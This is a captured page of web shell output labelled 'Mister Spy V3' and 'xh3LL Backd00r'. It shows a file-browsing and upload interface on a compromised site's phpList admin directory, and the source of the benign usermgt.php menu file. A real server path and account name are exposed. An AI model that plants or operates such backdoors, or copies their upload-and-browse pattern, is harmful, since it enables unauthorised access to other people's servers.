Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/phplist/lists/admin/
Upload File :
Current File : /home/caballoscriollos/public_html/phplist/lists/admin/usermgt.php

<?php
require_once dirname(__FILE__).'/accesscheck.php';

#$spb ='<li>';
#$spe = '</li>';
# Replace the $spb & $spe by <li id="li_ID"> & </li>
$html = '<ul>';
$html .= '<li id="users">'.PageLink2("users",$GLOBALS['I18N']->get('search subscribers')).'</li>';
$html .= '<li id="attributes">'.PageLink2("attributes",$GLOBALS['I18N']->get('manage subscriber attributes')).'</li>';


$attributehtml = '';
if ($tables["attribute"] && Sql_Table_Exists($tables["attribute"])) {
  $attrmenu = array();
  $res = Sql_Query("select * from {$tables['attribute']}",1);
  while ($row = Sql_Fetch_array($res)) {
    if ($row["type"] == "checkboxgroup" || $row["type"] == "select" || $row["type"] == "radio")
      $attrmenu["editattributes&amp;id=".$row["id"]] = strip_tags($row["name"]);
  }
}
foreach ($attrmenu as $page => $desc) {
  $link = PageLink2($page,$desc);
  if ($link) {
    $attributehtml .= '<li>'.$link.'</li>';
  }
}
if (!empty($attributehtml)) {
  $html .= '<li id="edit-values">'.$GLOBALS['I18N']->get('edit values for attributes').'<ul>'.$attributehtml.'</ul>';
}

$html .= '<li id="reconcileusers">'.PageLink2("reconcileusers",$GLOBALS['I18N']->get('Reconcile Subscribers')).'</li>';
$html .= '<li id="massunconfirm">'.PageLink2("massunconfirm",$GLOBALS['I18N']->get('Suppression list')).'</li>';
$html .= '<li id="massremove">'.PageLink2("massremove",$GLOBALS['I18N']->get('Bulk remove subscribers')).'</li>';
$html .= '<li id="usercheck">'.PageLink2("usercheck",$GLOBALS['I18N']->get('Verify subscribers')).'</li>';
if (ALLOW_IMPORT) {
  $html .= '<li id="import">'.PageLink2("import",$GLOBALS['I18N']->get('Import subscribers')).'</li>';
}
$html .= '<li id="export">'.PageLink2("export",$GLOBALS['I18N']->get('Export subscribers')).'</li>';
$html .= '</ul>';

$p = new UIPanel($GLOBALS['I18N']->get('subscriber management functions'),$html);
print $p->display();

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat